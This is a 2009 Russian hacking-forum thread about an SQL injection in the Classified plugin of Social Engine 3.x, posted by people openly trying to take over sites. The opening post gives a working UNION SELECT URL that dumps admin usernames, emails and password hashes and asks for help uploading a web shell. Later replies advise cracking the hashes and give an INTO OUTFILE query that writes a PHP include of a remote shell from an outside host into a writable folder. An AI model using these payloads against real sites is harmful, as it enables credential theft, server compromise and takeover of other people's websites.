ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Social Engine SQL инекция !
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Social Engine SQL инекция !
  #1  
Старый 18.01.2009, 16:52
Аватар для eworld.uz
eworld.uz
Познающий
Регистрация: 18.01.2008
Сообщений: 31
Провел на форуме:
114816

Репутация: 13
Отправить сообщение для eworld.uz с помощью ICQ
Smile Social Engine SQL инекция !
В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция !

Вот sql инекция :


PHP код:
http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_password)
,2,3+from+se_admins 
Как залить шелл ? Помогите друзья !

Вот это скрин таблицы se_admins



CHMOD 777 стоит в папках http://sitename.ru/uploads_user


и на http://sitename.ru/include/smarty/templates_c

Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь
 
Ответить с цитированием

  #2  
Старый 20.01.2009, 23:35
Аватар для Arigona
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию
и чё с этой скуль иньекцией мона сделать? ты не разяснил, многим не понятно.
 
Ответить с цитированием

  #3  
Старый 21.01.2009, 03:54
Аватар для krobol
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527

Репутация: 14
Отправить сообщение для krobol с помощью ICQ
По умолчанию
получить хэши, расшифровать их и зайти в админку.

а по заливке шелла так никто и не подскажет?
 
Ответить с цитированием

  #4  
Старый 21.01.2009, 03:56
Аватар для NFM
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию
версия мускула какая
 
Ответить с цитированием

  #5  
Старый 21.01.2009, 04:03
Аватар для krobol
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527

Репутация: 14
Отправить сообщение для krobol с помощью ICQ
По умолчанию
Цитата:
Сообщение от NFM  
версия мускула какая
5.0.51a
 
Ответить с цитированием

  #6  
Старый 21.01.2009, 04:09
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
/phpMyAdmin => INTO OUTFILE ? (заливка шела в phpmyadmin ищи на форуме более кокретные примеры если требуется. ни раз поднимался вопрос)
Последний раз редактировалось xcedz; 21.01.2009 в 04:12..
 
Ответить с цитированием

  #7  
Старый 21.01.2009, 04:15
Аватар для NFM
NFM
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686

Репутация: 531


По умолчанию
https://forum.antichat.ru/threadnav43966-1-10.html
вот здесь почитай про заливку шела
 
Ответить с цитированием

  #8  
Старый 21.01.2009, 04:26
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Цитата:
select '<? @include("http://shell.ru/shell.txt"); ?>' into outfile '/home/blalblalba//uploads_user/shell.php';
File_priv положение вкл
 
Ответить с цитированием

  #9  
Старый 21.01.2009, 04:35
Аватар для krobol
krobol
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527

Репутация: 14
Отправить сообщение для krobol с помощью ICQ
По умолчанию
phpmyadmin есть у автора темы.
у меня по его sql-inj есть только доступы к админкам.
где он взял данные по доступу к базе и phpmyadmin я не знаю.

например админка такого сайта:

<вырезано>

как можно туда залить шелл?
Последний раз редактировалось krobol; 21.01.2009 в 04:45..
 
Ответить с цитированием

  #10  
Старый 21.01.2009, 04:43
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
попробуй через шаблоны
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ